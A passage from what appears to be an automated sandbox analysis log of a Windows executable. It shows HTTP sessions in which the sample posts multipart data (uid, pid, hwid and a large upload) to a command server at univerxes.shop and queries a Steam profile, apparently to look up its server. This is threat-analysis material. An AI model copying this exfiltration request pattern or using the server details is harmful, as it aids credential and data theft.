                                                                                                                                                                                                        2025-03-11 16:29:22 UTC5214OUTData Raw: 2a ad 3d 1c b0 b5 7d ba 60 d4 b6 22 51 6b 5c d5 e3 07 6a 81 6d e4 25 87 96 d8 b9 c2 ec ea 0a 28 61 e1 2d 0b 8a b0 00 3d fe 96 5c 11 ca b7 37 6f b4 61 26 9f ab 28 16 f4 62 f2 8b 5d db 7a b4 0e 89 ec 08 2c c5 15 7b 16 c1 c6 91 df f3 1d f4 ea e8 a1 1b 82 72 9e 9d 4f be 0f b4 2f 54 1e 14 a6 64 23 7d a5 3b 16 d9 b5 67 54 b4 dd b3 dd 18 a8 4c d4 f8 8b b5 60 f3 af 4d d9 bb 7f c1 3d bd 6f 60 7f 49 33 b5 d4 33 fe 15 c8 47 8c dc ef d6 3a 52 bd 7d bb 8e cd 10 35 b1 c9 1e bc 25 34 2f 7f b3 52 43 5f 6c eb 50 cf e2 d9 9d 83 ae b7 e4 58 4b ee 1b cc 3c 67 4e ba 9c 10 24 50 c8 7d 37 48 00 f6 a4 c5 88 55 bb 16 e9 78 4e 98 53 b3 9f 0a 44 4d 4b 8e b5 40 e7 0a 0a da 0c a4 c4 bd 76 1f ba fc e3 58 b5 b2 ff 81 cc 9c e5 dc 90 d4 b4 83 0f 5f 36 3d 43 28 02 75 9f 29 45 b2 21 c2 df
                                                                                                                                                                                                        Data Ascii: *=}`"Qk\jm%(a-=\7oa&(b]z,{rO/Td#};gTL`M=o`I33G:R}5%4/RC_lPXK<gN$P}7HUxNSDMK@vX_6=C(u)E!
                                                                                                                                                                                                        2025-03-11 16:29:23 UTC814INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 11 Mar 2025 16:29:23 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qg0FNHKDmheKxN4OgryuZzjIRh5aanE0Qr90pHd7RoilpzYAjAKmOX189moUWtydev0ff2dyorsN6bUSXl658GXEgAUculKQMiRbL4zFefKaQKFVAMd2v1%2FLE6doSzRW1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 91ec6e27f855c3f5-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=40469&min_rtt=39823&rtt_var=12321&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2833&recv_bytes=21501&delivery_rate=68005&cwnd=32&unsent_bytes=0&cid=9f9550c2a2a6b4f8&ts=1054&x=0"
                                                                                                                                                                                                        2025-03-11 16:29:23 UTC75INData Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 34 32 2e 31 36 36 2e 32 38 22 7d 7d 0d 0a
                                                                                                                                                                                                        Data Ascii: 45{"success":{"message":"message success delivery from 76.242.166.28"}}
                                                                                                                                                                                                        2025-03-11 16:29:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        5192.168.2.549715172.67.213.1714438332C:\Users\user\Desktop\biyhoksefdad.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-03-11 16:29:27 UTC276OUTPOST /SwnNW HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=Q73r4i0A0ZxSZ
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Length: 2473
                                                                                                                                                                                                        Host: univerxes.shop
                                                                                                                                                                                                        2025-03-11 16:29:27 UTC2473OUTData Raw: 2d 2d 51 37 33 72 34 69 30 41 30 5a 78 53 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 66 32 37 34 65 33 39 64 38 65 39 61 33 61 61 63 39 64 36 30 38 33 38 31 62 30 39 37 30 30 31 64 61 33 39 61 38 39 66 38 36 39 64 36 64 35 32 65 63 66 37 32 32 65 32 32 0d 0a 2d 2d 51 37 33 72 34 69 30 41 30 5a 78 53 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 37 33 72 34 69 30 41 30 5a 78 53 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 32 38
                                                                                                                                                                                                        Data Ascii: --Q73r4i0A0ZxSZContent-Disposition: form-data; name="uid"f274e39d8e9a3aac9d608381b097001da39a89f869d6d52ecf722e22--Q73r4i0A0ZxSZContent-Disposition: form-data; name="pid"1--Q73r4i0A0ZxSZContent-Disposition: form-data; name="hwid"E028
                                                                                                                                                                                                        2025-03-11 16:29:28 UTC819INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 11 Mar 2025 16:29:28 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vkFWNYxJ%2B8OesRW7VAUaXvkgVeOy3vHiMFGG7%2FtZq7lYGa66w0yxgLPhysUpZBHGFZudzsJt%2BtiDeUgMITdTYQwL2k%2FzWxt85xkRPEr0GMaKQZeyZtDuJaZcUYW%2B18DFpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 91ec6e482c166215-ORD
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=51611&min_rtt=50362&rtt_var=15283&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2832&recv_bytes=3385&delivery_rate=57494&cwnd=32&unsent_bytes=0&cid=22fd825dc24919e9&ts=1199&x=0"
                                                                                                                                                                                                        2025-03-11 16:29:28 UTC75INData Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 34 32 2e 31 36 36 2e 32 38 22 7d 7d 0d 0a
                                                                                                                                                                                                        Data Ascii: 45{"success":{"message":"message success delivery from 76.242.166.28"}}


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        6192.168.2.549716172.67.213.1714438332C:\Users\user\Desktop\biyhoksefdad.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-03-11 16:29:31 UTC282OUTPOST /SwnNW HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=4A9KU35TST2zC59CJ
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Length: 571127
                                                                                                                                                                                                        Host: univerxes.shop
                                                                                                                                                                                                        2025-03-11 16:29:31 UTC15331OUTData Raw: 2d 2d 34 41 39 4b 55 33 35 54 53 54 32 7a 43 35 39 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 66 32 37 34 65 33 39 64 38 65 39 61 33 61 61 63 39 64 36 30 38 33 38 31 62 30 39 37 30 30 31 64 61 33 39 61 38 39 66 38 36 39 64 36 64 35 32 65 63 66 37 32 32 65 32 32 0d 0a 2d 2d 34 41 39 4b 55 33 35 54 53 54 32 7a 43 35 39 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 41 39 4b 55 33 35 54 53 54 32 7a 43 35 39 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68
                                                                                                                                                                                                        Data Ascii: --4A9KU35TST2zC59CJContent-Disposition: form-data; name="uid"f274e39d8e9a3aac9d608381b097001da39a89f869d6d52ecf722e22--4A9KU35TST2zC59CJContent-Disposition: form-data; name="pid"1--4A9KU35TST2zC59CJContent-Disposition: form-data; name="h
                                                                                                                                                                                                        2025-03-11 16:29:31 UTC15331OUTData Raw: b8 5f b9 53 64 f9 78 7d 5f 9a 42 e6 6c 86 f6 c6 87 15 3e 02 a4 44 5b 42 5b 31 2a f8 50 56 8e 5d 23 81 00 e2 d2 8b 20 94 d5 ce 8f 9e 20 38 cd a1 7f bc 8a 89 b7 9a b7 10 69 a0 11 08 a5 2b af a3 78 82 02 34 31 a1 13 0c 23 7a 81 c6 3c f6 4d 2e 9c 22 0f 40 36 c4 2b fc 99 e6 b2 d6 ab 66 83 94 27 ad 43 28 38 0d b5 c2 61 7d 91 86 44 f6 82 d8 fd d4 2f c7 4d e0 b1 7a c2 16 96 39 6a 1a d0 f2 7a 83 57 2e d4 3a 88 73 4e 0d 47 67 e3 de 73 9c 25 c9 0c 5c ed b7 54 92 64 eb c1 e3 c2 a6 04 98 10 74 aa 64 3c 6d 64 21 d5 c1 6b 0e 4a 71 66 16 06 4a 19 35 16 50 92 50 e1 1f 8e 1d 03 30 f8 45 00 57 73 88 a1 df 1e a3 83 ac f3 ff ba 76 00 5a 16 f7 f3 da 50 e6 0a 0f 1e b3 f6 62 be 27 19 8b 77 b9 ec b7 30 80 e2 7c ab 44 97 04 9d e0 ed 9b 8b ab fd c9 94 ac ee 81 84 ee 40 83 fe 88 19
                                                                                                                                                                                                        Data Ascii: _Sdx}_Bl>D[B[1*PV]# 8i+x41#z<M."@6+f'C(8a}D/Mz9jzW.:sNGgs%\Tdtd<md!kJqfJ5PP0EWsvZPb'w0|D@
                                                                                                                                                                                                        2025-03-11 16:29:31 UTC15331OUTData Raw: a6 e7 5d 8f a3 ef 19 b4 72 9b 34 80 b2 d9 ca f8 03 01 3c 0f b1 51 a6 c6 af ea 49 0a d8 4b 75 cc 5c b4 d4 db e4 95 0b da ba 72 25 ff 7d f5 e0 a6 70 53 0d 3b 42 b0 c4 ea be 61 80 8d c2 46 09 a7 b2 9c f7 d6 fd 43 a6 b8 20 3b e5 df 27 73 e4 ca 2a 9b c1 86 75 43 ff 51 94 10 4e 5c af 56 27 45 8b fa 3e ef a5 2b 39 9f b6 b7 02 44 06 19 fc f5 5a 61 9f 5d 0a 40 df 92 d2 d0 db b6 ea ca c5 50 73 fd 3c 9f b3 d8 7f 76 ee a8 d7 62 2f 8f 8c 3b 79 75 c4 3a 07 66 9c 92 36 fa 21 e5 1e 02 41 c6 53 5e c1 3e e9 80 d5 57 16 7f 7a a8 23 6f ea 70 30 09 da 67 5b 56 29 25 74 38 a9 1e 24 a9 37 c3 7e 3a 08 1d 22 01 69 1d 67 b7 dc 6b 49 37 7d 14 83 cb 40 9f 5b 9d ac 14 d1 e5 14 b8 86 36 08 f6 50 df ca 77 08 16 3b 8d c5 cd d0 32 ef 00 cd bb 5e b5 8f f7 2a 9d da bc c5 b2 43 59 68 4d fb
                                                                                                                                                                                                        Data Ascii: ]r4<QIKu\r%}pS;BaFC ;'s*uCQN\V'E>+9DZa]@Ps<vb/;yu:f6!AS^>Wz#op0g[V)%t8$7~:"igkI7}@[6Pw;2^*CYhM
                                                                                                                                                                                                        2025-03-11 16:29:31 UTC15331OUTData Raw: c5 d2 a8 f9 77 0c d4 ee 01 59 e3 c4 ee 15 d6 68 68 cd ab a8 03 57 81 0e c2 55 4c 3e 0e b8 11 89 68 e2 18 e6 07 92 95 dd 95 71 8c c4 0a 49 e6 88 c9 1f 3d 27 00 49 0b 6d 1c 87 19 83 c7 a7 64 a8 4c 2f c6 49 27 c6 2e ec 23 c0 7c 15 a5 7c 7b 26 18 87 e1 5e dd 39 07 bc 8a 04 eb 1a a9 32 2d 73 35 b2 d7 09 10 0b 4f 87 c6 ef 35 e2 0b 29 f0 2c b6 f2 66 c9 45 dd fc d9 98 6d 85 61 11 83 59 b8 e3 8f 1a 0e 08 35 b9 26 e8 d6 e9 c9 d8 35 e5 fd 72 1a ac ac 06 59 79 f8 dd 27 7e f5 2c 88 47 d3 38 73 3d 5c 01 91 cf 1f 07 20 22 b9 82 7e 1e 57 92 d4 42 20 0d 9b b4 a9 86 e1 6d 76 86 71 9d 20 b6 87 15 e1 4d 65 67 30 2a 58 6c fc 5e 6f 50 77 09 16 9a 21 cd 14 80 73 3e 6f 9f 5f 2a 76 87 b9 a8 75 f6 d7 db 37 45 83 ee a3 13 17 9b b0 d3 7f b0 0f f2 bb dc e7 82 9d a8 31 cc 16 ee ac f4
                                                                                                                                                                                                        Data Ascii: wYhhWUL>hqI='ImdL/I'.#||{&^92-s5O5),fEmaY5&5rYy'~,G8s=\ "~WB mvq Meg0*Xl^oPw!s>o_*vu7E1
                                                                                                                                                                                                        2025-03-11 16:29:31 UTC15331OUTData Raw: 51 b3 f5 b7 df 93 68 b8 61 d8 d0 95 68 c2 68 6b 93 0b 35 ae 04 9e 7f 73 a4 65 73 f5 77 ae 0b ba d5 3e 8e 71 8d 84 d6 a1 2f af ef 28 b6 91 75 b9 43 2c 9a 5f ed 8b e8 0b 10 86 6f 64 22 fd a2 86 79 52 12 6a 5e c8 e0 ba a6 b5 ce b6 55 6d e0 5f c7 12 ca 65 c8 19 68 5f 71 94 07 19 f4 9f 3c 0d 20 7c ca 06 39 d1 c5 b1 89 3f 48 18 8e c4 fa 1f 13 b9 16 ac b9 ea 19 d1 e9 92 8c 37 e2 f2 42 c7 9e 18 01 3a 22 fd c2 7c 6f 3a 88 00 e6 7d f0 89 71 ac 8c 79 b7 c7 63 59 04 7a 41 60 19 db dd ff 7d 72 3a 1e 6f 1d 8c 2d f4 60 0f 93 b3 c5 7d 2b 16 3c b3 08 14 34 4e 5b 25 d8 4e 20 1a 3c 4a b8 e2 6d 57 15 63 ce 8e 3b 16 4b 95 e6 c8 04 92 23 a1 3c a7 86 0e eb 30 ee eb bd 64 d8 c8 c7 54 e6 ba f3 ef be 2f ed af 9a 5a bd 58 c2 cf 0b ae 9f 19 da 8a 44 41 df fa 37 30 ed d1 59 12 c5 b4
                                                                                                                                                                                                        Data Ascii: Qhahhk5sesw>q/(uC,_od"yRj^Um_eh_q< |9?H7B:"|o:}qycYzA`}r:o-`}+<4N[%N <JmWc;K#<0dT/ZXDA70Y
                                                                                                                                                                                                        2025-03-11 16:29:31 UTC15331OUTData Raw: ec 4a e2 56 52 29 73 ab ed 9a 49 4e f1 62 9e 53 a5 b8 c3 92 5f 2c 4c ce df 20 c8 61 aa bd 48 21 6d f6 35 6e b0 ad e3 5e 18 e9 dd 00 81 bb ce c2 5d 23 cc ea 07 8a c3 a5 80 c2 26 20 9e b7 64 af e7 cd 17 5c 0a e1 09 18 c1 fa cc 33 a6 98 c0 3e 96 ba a0 b2 5f 9c 89 52 b1 4f e8 df 8b 2e fa 87 2d ba 27 8f 40 6e d4 da e8 a4 20 94 ca 7f e5 70 8c eb 28 f7 c3 ac 31 a1 96 9a 59 51 f8 dc 89 9a 93 a9 79 3b 1f 15 07 74 d5 b4 34 e7 fd b8 c9 b8 30 a7 c0 1f 63 6a e8 47 25 ea 76 90 35 f1 87 e2 01 44 d8 1a 6f f1 bb 0f 8b 32 f0 e8 e5 9c b2 29 c4 8b 3e d5 1f 58 9f 7c 5b a9 d6 6d 62 a6 d4 a0 90 ae 65 c3 25 9a 58 0c 5d 00 52 a2 ab 88 c6 e3 51 72 6e 17 8e db 41 71 66 4e 78 47 98 62 3d 5b 1e cb 61 ef b4 18 b0 f6 f4 7b c4 ba e2 75 86 1d 5b 82 7c fe d5 c6 22 07 ca f7 0b 32 9b 4b a7
                                                                                                                                                                                                        Data Ascii: JVR)sINbS_,L aH!m5n^]#& d\3>_RO.-'@n p(1YQy;t40cjG%v5Do2)>X|[mbe%X]RQrnAqfNxGb=[a{u[|"2K
                                                                                                                                                                                                        2025-03-11 16:29:31 UTC15331OUTData Raw: 54 b0 05 c3 ae 2f 70 7f ea d9 d8 c0 ca b5 88 2e bd 5e 3f 43 43 26 28 f4 0f 71 ab 89 b6 8c e0 ed e7 67 a5 7c e3 b7 83 ec 3c b4 7e 59 62 9f 56 00 2a 6c 70 07 f9 a2 be 17 d3 5c de ab 50 89 5c 77 45 0e da 42 ec 0b 02 c4 d6 e9 b7 ef 9d 27 9d 80 40 6e a2 92 7f fc ed 93 64 2a e4 49 75 74 b4 6f 20 78 bb 5d 78 9d a5 65 bd df a3 21 b3 0f cf 7b 8d 8f 90 c4 de a5 9f 11 12 23 38 7e 7b 1c 9f 2b 33 aa db 97 97 3f 28 dd 2a c3 e9 3e f6 56 04 34 42 10 93 5e 89 13 c1 39 fb b1 74 8a 40 64 fd 78 66 de eb c0 8b d6 30 96 a2 57 09 8c ef dc 15 65 01 16 04 9f fa 3a 22 f7 2f 2e 23 75 a8 a6 7d 69 98 78 46 e9 03 64 7d 97 bc 92 1f 8c 93 c2 7b e3 cf d4 31 92 e2 0b cc 19 24 8e 49 6e 48 4e 44 37 fb 8c 74 2d 65 42 ed ce 48 33 f3 be 87 bc 64 0a c4 94 48 56 ef 40 9d ab 61 07 71 66 30 b7 2c
                                                                                                                                                                                                        Data Ascii: T/p.^?CC&(qg|<~YbV*lp\P\wEB'@nd*Iuto x]xe!{#8~{+3?(*>V4B^9t@dxf0We:"/.#u}ixFd}{1$InHND7t-eBH3dHV@aqf0,
                                                                                                                                                                                                        2025-03-11 16:29:31 UTC15331OUTData Raw: 54 28 0b 9b af 39 bd 23 3a 53 cc 9f 38 9c 2b c5 01 ac 73 f5 09 85 6d 61 f2 79 9f bb 0b 56 f4 b4 1a e6 b5 fa 62 55 a9 2b 15 08 11 9d 9a 79 0f ed dc a9 23 08 47 9e 17 58 42 b8 40 7f 64 ce 08 b4 83 b8 e8 84 1c a0 d7 b1 f5 c1 5a 4d ae cb 48 d2 e7 af cd 77 4a d3 c8 c5 ba 8b d5 d6 60 93 5a 9c 52 72 b6 56 dc 23 6f 08 2b c9 c5 97 43 ff 71 72 2b 89 d9 c8 63 ef 9d 10 54 78 25 08 dc 8f 73 cf 34 9b 4c f4 b0 ee ce 83 08 73 95 9d 1a ab d4 66 4f 33 a0 7b d4 0e 99 3a 17 66 f1 d0 b4 67 15 0c 82 41 11 db 00 38 77 1e 68 02 2f c6 80 9c 4f 4d 0f 40 2a 3b eb 39 62 8d 95 8f 10 70 49 e9 14 27 fd cd 68 ba 83 6d 00 63 bd 29 58 d9 50 12 13 5b ce 0b 94 11 75 bd af 13 eb 6d 77 56 95 b4 15 46 19 20 3b 46 f0 1a 2b cb 65 3a 7a 34 48 72 b5 3b 51 86 1a 7c 29 ef 0b 83 0d 3c a6 44 bc b5 47
                                                                                                                                                                                                        Data Ascii: T(9#:S8+smayVbU+y#GXB@dZMHwJ`ZRrV#o+Cqr+cTx%s4LsfO3{:fgA8wh/OM@*;9bpI'hmc)XP[umwVF ;F+e:z4Hr;Q|)<DG
                                                                                                                                                                                                        2025-03-11 16:29:31 UTC15331OUTData Raw: 0e de cd f3 2c 8b a3 7f a8 5d 5f b6 4d 12 4c 1e 99 17 6c 02 92 66 4d fa 09 6e c7 2e 24 f8 98 fe 91 74 e5 b4 58 06 4a 68 74 e9 38 9c cd 7b bb 12 11 77 7c a4 34 6a 76 da 9f 27 df ac 3a 0c d5 23 5b 43 11 0b 40 2b 24 3b e1 87 f5 e3 55 78 af 3a b1 5d 31 41 ad 3e e7 53 a3 df 52 94 68 37 6f 01 6a 86 7c b1 8c 43 72 5e 6b 4c 8d f5 c4 aa 16 7b a5 58 61 f6 12 21 46 a8 47 4c 38 e9 3f 40 1c ed 4a 8c 74 c6 33 e1 82 39 e1 a0 38 e4 f6 dd 9e ef 79 5b 1e d3 51 b1 54 59 8b da df 7c 01 01 54 5d c5 91 c9 06 53 21 94 1e 77 6d 1e e3 80 54 26 75 85 88 23 77 3c 28 06 22 b8 19 01 da 54 b1 29 5b d2 9b bd 4d cb a0 7e d9 51 29 45 23 3f ed 71 fd b4 66 0b 67 bc 84 a8 0a 30 39 8d 8c 60 9b ea 67 70 9d c9 82 c5 a0 a8 a5 fc 6e cf 72 51 72 58 8c 46 d0 b9 32 01 b5 93 3d 99 09 ab 70 81 46 4f
                                                                                                                                                                                                        Data Ascii: ,]_MLlfMn.$tXJht8{w|4jv':#[C@+$;Ux:]1A>SRh7oj|Cr^kL{Xa!FGL8?@Jt398y[QTY|T]S!wmT&u#w<("T)[M~Q)E#?qfg09`gpnrQrXF2=pFO
                                                                                                                                                                                                        2025-03-11 16:29:31 UTC15331OUTData Raw: 79 35 5f 1a de e4 00 d0 6f 98 ec 33 14 89 d4 1e 81 f2 bb ec 3a 39 a5 0d 1c 74 31 64 32 f2 5a 70 1e 99 95 be 76 86 19 01 e0 02 8f 69 63 8b 3f d7 b6 a7 49 8d cb ea db cd f2 21 ff 78 50 8e 9a 1d c3 20 fa 65 d1 2a c5 d7 4b 0b 4e a0 6c 4e 0e f0 d4 e7 14 34 35 c5 e6 5e 48 2f 8d 03 94 b7 71 e6 58 2f 8b 45 cb 2c 1b f3 ec d2 a9 c9 f8 0a aa df 89 5b 77 73 61 b2 7a 63 fd f4 ae d3 85 01 eb 9f c9 f9 37 fc 92 5c 93 9f 1e ab 81 0a 6c fd f1 d0 a0 09 4c 4b 1c cb 80 c2 10 ad 95 45 6f 56 c4 99 19 b3 35 fd 19 61 3c 7f a9 2c 95 67 77 6f 14 13 93 d6 23 67 51 c4 78 73 50 8b 1f 49 70 f2 9c 3c 16 60 56 06 39 95 b7 0a bc c5 28 33 94 2c 4b e7 0c 9b 37 fe 7b 4d 51 14 60 d4 f0 6e b8 69 50 99 fd 38 60 23 25 ac 16 51 c5 09 eb 10 3d 9a d4 61 89 b0 08 f9 58 8a 89 89 4a 26 eb 29 bc 6c 1d
                                                                                                                                                                                                        Data Ascii: y5_o3:9t1d2Zpvic?I!xP e*KNlN45^H/qX/E,[wsazc7\lLKEoV5a<,gwo#gQxsPIp<`V9(3,K7{MQ`niP8`#%Q=aXJ&)l
                                                                                                                                                                                                        2025-03-11 16:29:33 UTC272INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 11 Mar 2025 16:29:33 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                        CF-RAY: 91ec6e5eaf3a6210-ORD
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        7192.168.2.549720104.73.234.1024438332C:\Users\user\Desktop\biyhoksefdad.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-03-11 16:29:37 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                        2025-03-11 16:29:38 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                        Date: Tue, 11 Mar 2025 16:29:38 GMT
                                                                                                                                                                                                        Content-Length: 26508
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: sessionid=64a000a78c4b001a9e97dc25; Path=/; Secure; SameSite=None
                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7Cdf4d9cf365335b2c152b7982a59e4c1e; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                        2025-03-11 16:29:38 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                        2025-03-11 16:29:38 UTC12098INData Raw: 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
